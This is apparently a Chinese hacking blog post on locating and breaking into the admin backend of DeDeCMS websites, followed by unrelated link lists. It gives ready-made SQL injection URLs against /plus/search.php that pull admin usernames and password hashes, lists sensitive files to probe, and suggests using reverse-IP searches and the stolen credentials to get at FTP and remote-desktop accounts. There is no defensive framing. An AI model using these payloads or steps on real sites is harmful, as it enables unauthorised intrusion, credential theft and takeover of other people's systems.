dedecms站找后台的一些经验

首先:

注入exp

有时候 有些 /plus/目录换成了 /plugins目录

/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

/plus/search.php?keyword=as&typeArr[ uNion ]=a

/robots.txt

/data/admin/ver.txt

/data/mysql_error_trace.inc

第一 个看这里 /data/mysql_error_trace.inc 爆出来补 

第二 个  域名作为后台 或者域名变形一下

第三 个 先ping域名 获得ip地址 之后 

http://www.bing.com/

搜索 ip:127.0.0.1  php 有可能获得后台 也可以获得其他旁注站 一般dedecms的旁站很多也是dedecms 的  

第四 个  查看 robots.txt

http://www.dedecms.com/robots.txt  查看旁注站dedecms的站  再去社工目标站的后台地址也可以

第五 个  注入exp得到账号 去社工 ftp 和 3389密码 

更多相关文章
  •  貌似很纠结,今天去暗组转了一圈,看到某牛发的一个帖子,是一找后台的大黑阔去非你莫属找工作的视频,看完以后我凌乱了,艹,这个黑阔真心S+B,你们看视频吧,http://static.video.qq.com/TPout.swf?vid=h001295l7ee&auto=1第一,我觉的他的记忆 ...
  •      国庆放假后我和我们班的几个同学就来到长沙.开始了我们找工作的历程,因为我们全都是从学校刚出来,社会阅历不足,到了这个让我们几个觉得陌生的城市,人生地不熟真的是不知该从何从着手,我们都只知道唯一的途径那就是人才招聘会,     我现在来长沙十多天了,找了几天的工作,体会到了现在社会上的竞争是 ...
  • 当老板问你是否要休息时,多半他是不希望你休息的. 你的第一份工作非常重要,不要轻易跳草,等你做满一年以上时,你会清楚你是否真的需要跳跳. 工作2-3年后,一定要弄清自己的职业方向在哪里.不然你会越走越迷惘. 定了职业方向你一定要坚持走下去,不要轻言放弃.要知道,无论哪个行业,只要你选对了方向,只要你 ...
  • 求百科 apache+php+mysql 在cenos32位安装完后搭建dedeCMS网站后台验证码不显示环境:apache2.2.22 php 5.2.17 mysql 5.1.37 编译安装完后所apache的安装:#./configure --prefix=/usr/local/apache ...
  • 一.网站策划书:为什么要制作网站?网站提供什么内容?设计什么样的风格适合网站?站点制作步骤布局及模块分析技术支持及培训安排推广方案二.网站策划都做什么?1.进行市场调查(根据网站定位进行的市场调查,方式:网络.现实填表.)2.确定网站规模(大型站点.小型站点还是中型站点)3.确定网站的类别及设计特色 ...
  • 上周有幸通过了某知名IT公司的笔试,获得了一次难得的面试经历,说句实在话,可能我参加的面试还不如很多学弟学妹参加的多,一方面是因为学校这边的要求比较严,很难获得实习的机会,另一方面也是我自己的问题,在这方面不算主动,导致到现在还没有真正的实习过一次,想想就觉得是人生一大遗憾啊(此处略去360个字), ...
  • 19种 网站入侵方法1.经典注入通常,判断一个网站是否存在注入点,可以用’,and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,来判断,如果and 1=1正常返回页面,1=2错误,或者找不到,那么就存在注入点2.万能密码OR漏洞万 ...
  • 首先把,主站入手注册一个账号,看下上传点,等等之类的.用google找***入点,格式是Site:XXX.com inurl:asp|php|aspx|jsp最好不要带 www,因为不带的话可以检测二级域名.扫目录,看编辑器和Fckeditor,看下敏感目录,有没有目录遍及,查下是iis6,iis5 ...
一周排行
  •  制作nginx rpm包-添加第三方cache_purge插件 系统环境:CentOS6  64bitnginx 1.4.1cache_purge 2.1 过程如下:# yum -y install rpm-bui ...
  • 一.fdisk 常用命令fdisk  -l  :查看当前磁盘的分区情况fdisk  /dev/xvdb:为该磁盘进行分区在输入命令:fdisk  /dev/xvdb 之后,系统会进入到磁盘的分区界面,会显示" ...
  • SQL Server Profiler – 存储过程调试SQL Server中有许多不同的工具可以帮助调试复杂的存储过程.它们包括Visual Studio中可用的Transact-SQL调试器,可以用来嵌入打印语句 ...
  • 在WEB页面插入table后,不能在c#中读写table单元格,经查,因为table不是服务器控件,需要让他运行在服务器才能解决问题,即在源代码(xml代码)中,将<table >改成<table  ...
  • 几个月前的投往<IT实验室周报>的文章终于发表了,很激动,第一次在实体杂志上发表技术文章. 网站文章地址 穿越防火墙 让远程桌面自由连接 [url]http://www.qqread.com/safe-t ...
  •       在2010年4月14日7时49分,青海玉树发生7.1级地址.今天全国默哀,下半旗志哀.凌晨0点30分进行赈灾晚会,筹得捐款21.75亿超过汶川地震.最新消息遇难人数达2064人,失踪193人,受伤1213 ...
  • 一夜之间,微信电话本就在用户的手机联系人之间广为流传,似乎微信电话本真的火.真的如此吗?何玺认为,微信电话本的火爆可能是暂时的假象,就它目前的功能不做改进的话,用不了多久,它就将成为过去.关于微信电本据微信团队介绍, ...
  • 1.问题OutOfMemoryError: 内存不足:内存泄漏线程死锁锁竞争(Lock Contention)java消耗过多的CPU2.java常用健康工具jps (java virtual machine pro ...
  • 在MainServlet启动Struts中央控制器之后第一件事情就是去处理启动事件:protectedvoid processStartupEvents() throws Exception {     Startu ...
  • 前言:xml的操作方式有多种,但要论使用频繁程度,博主用得最多的还是Linq to xml的方式,觉得它使用起来很方便,就用那么几个方法就能完成简单xml的读写.之前做的一个项目有一个很变态的需求:C#项目调用不知道 ...